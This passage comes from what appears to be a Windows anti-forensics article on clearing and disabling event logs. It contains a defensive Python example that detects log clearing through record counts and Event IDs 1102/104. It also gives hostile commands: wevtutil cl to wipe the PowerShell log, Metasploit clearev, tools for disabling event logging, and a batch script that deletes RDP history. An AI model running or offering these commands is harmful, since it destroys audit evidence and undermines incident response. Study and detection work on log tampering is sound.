wevtutil qe /f:text "windows powershell"
Delete all records of a single log category:
wevtutil cl "windows powershell"
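The wevtutil commands above are what is run to read and clear a log; the defender's counterpart is to notice the clearing itself. Two signals are cheap to check: the record count reported by `wevtutil gli` for a log drops between two snapshots, and the clear operation is itself recorded as Event ID 1102 (Security log cleared, source Microsoft-Windows-Eventlog) or 104 (System log cleared). The following Python is an added example, not code from the original article: it parses `wevtutil gli` output in exactly the format shown above, compares two snapshots, and scans `wevtutil qe /f:text` style output for those two event IDs. All sample text is constructed; the host DC01.pentest.com and the timestamps are hypothetical.

```python
"""Parse wevtutil text output and flag signs that a Windows event log was cleared.

Added example (not from the original article). Both samples are constructed
to match the wevtutil text formats; host name and timestamps are made up.
"""
import re

# Snapshot of `wevtutil gli Security` taken earlier (constructed).
GLI_BEFORE = """creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
"""

# Same log a few minutes later: far fewer records than before (constructed).
GLI_AFTER = """creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:05:02.110Z
fileSize: 69632
attributes: 32
numberOfLogRecords: 3
oldestRecordNumber: 1
"""

# Constructed `wevtutil qe Security /f:text` output: one logon, then the clear.
QE_TEXT = """Event[0]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Date: 2017-08-08T08:01:20.979
  Event ID: 4624
  Task: Logon
  Level: Information
  Opcode: Info
  Keyword: Audit Success
  User: N/A
  User Name: N/A
  Computer: DC01.pentest.com
  Description:
An account was successfully logged on.

Event[1]:
  Log Name: Security
  Source: Microsoft-Windows-Eventlog
  Date: 2017-08-08T08:04:59.000
  Event ID: 1102
  Task: Log clear
  Level: Information
  Opcode: Info
  Keyword: Audit Success
  User: N/A
  User Name: N/A
  Computer: DC01.pentest.com
  Description:
The audit log was cleared.
"""

# 1102 = Security log cleared, 104 = System log cleared.
LOG_CLEAR_IDS = {"1102", "104"}


def parse_gli(text):
    """Turn `wevtutil gli` key: value lines into a dict; numeric fields become ints."""
    info = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        value = value.strip()
        info[key.strip()] = int(value) if value.isdigit() else value
    return info


def records_dropped(before, after):
    """True when a later snapshot holds fewer records than an earlier one.

    A log only shrinks when it is cleared or truncated; normal retention
    keeps the count flat or growing.
    """
    return after["numberOfLogRecords"] < before["numberOfLogRecords"]


def parse_qe_text(text):
    """Split `wevtutil qe /f:text` output into a list of field dicts, one per event."""
    events, current = [], None
    for line in text.splitlines():
        if re.match(r"^Event\[\d+\]:", line):
            current = {}
            events.append(current)
        elif current is not None and line.startswith("  ") and ":" in line:
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
    return events


def find_log_clear_events(events):
    """Return the events whose Event ID records a log being cleared."""
    return [ev for ev in events if ev.get("Event ID") in LOG_CLEAR_IDS]


if __name__ == "__main__":
    if records_dropped(parse_gli(GLI_BEFORE), parse_gli(GLI_AFTER)):
        print("record count dropped between snapshots: log was cleared or truncated")
    for ev in find_log_clear_events(parse_qe_text(QE_TEXT)):
        print(f"{ev['Date']} {ev['Computer']}: Event ID {ev['Event ID']} ({ev['Task']})")
```

Because the 1102/104 events live in the very log that was cleared, they only survive if the log is also forwarded off-host (Windows Event Forwarding or a SIEM agent); the snapshot comparison is the fallback for hosts where forwarding is not in place.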
Disabling Windows event logging
Tools
Invoke-Phant0m: https://github.com/hlldz/Invoke-Phant0m
Windwos-EventLog-Bypass: https://github.com/3gstudent/Windwos-EventLog-Bypass
msf
run clearlogs
clearev
Clearing 3389 (RDP) login records
@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit